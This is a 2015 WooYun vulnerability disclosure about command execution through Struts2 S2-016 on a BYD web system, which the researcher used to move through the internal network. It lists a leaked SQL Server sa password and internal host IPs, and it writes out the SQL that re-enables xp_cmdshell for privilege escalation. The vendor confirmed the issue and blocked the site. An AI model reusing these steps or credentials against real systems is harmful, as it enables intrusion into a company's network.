当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097814

漏洞标题:比亚迪某系统命令执行导致的内网漫游

相关厂商:bydauto.com.cn

漏洞作者: 氓氓童鞋

提交时间:2015-02-20 19:45

修复时间:2015-04-06 19:46

公开时间:2015-04-06 19:46

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-20: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-06: 细节向公众公开

简要描述:

之前提过比亚迪外网可能还有很多服务器存在命令执行 找了一下 果然有 而且还可以作为边界服务器漫游内网

详细说明:

http://csm.byd.com.cn/homeAction.action
S2-016

byd1.png

漏洞证明:

创建了个test用户,连接远程桌面进去看了下,有内网IP:

byd-new1.png


在此台计算上:
发现数据库配置信息:
<bean id="dataSource" class="org.apache.commons.dbcp.BasicDataSource" destroy-method="close">
<!-- SQL Server 2005 for microsoft -->
<!--
<property name="driverClassName" value="com.microsoft.sqlserver.jdbc.SQLServerDriver"/>
<property name="url" value="jdbc:sqlserver://10.12.3.143(137):1433;databaseName=cms"/>
-->
<!-- SQL Server 2005 for jtds -->

<property name="driverClassName" value="net.sourceforge.jtds.jdbc.Driver"/>
<!--正式 -->
<property name="url" value="jdbc:jtds:sqlserver://10.12.3.137:1433/cms"/>
<!--测试 -->
<!-- <property name="url" value="jdbc:jtds:sqlserver://10.12.3.143:1433/cms"/>-->
<property name="username" value="sa"/>
<property name="password" value="bydbyd"/>
sa权限,提权,遇到阻碍,禁止了cmshell 安全选项
直接sa链接进去 执行SQL 恢复了(所以这种加固是不彻底的,不能随意的将sa权限授予普通web用户):
EXEC sp_configure 'show advanced options', 1 --
RECONFIGURE WITH OVERRIDE --
EXEC sp_configure 'xp_cmdshell', 1 --
RECONFIGURE WITH OVERRIDE --
EXEC sp_configure 'show advanced options', 0 --
接着提权,创建test用户 连接:
这次应该是到了核心的内网了,看了下附近的服务器情况:

byd-inter.png


用同样的弱口令对10.12.3.*网段进行扫描:
又有两台内网主机可以提权:
10.12.3.126 --- sa/bydbyd
10.12.3.143 ---sa/bydbyd
没再深入了 ~

修复方案:

边界问题的网络配置很重要 运维中的权限也需要加强~
请给20rank 谢谢~

版权声明:转载请注明来源 氓氓童鞋@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-02 13:36

厂商回复:

感谢提供,目前已屏蔽该网站的访问。

最新状态:

暂无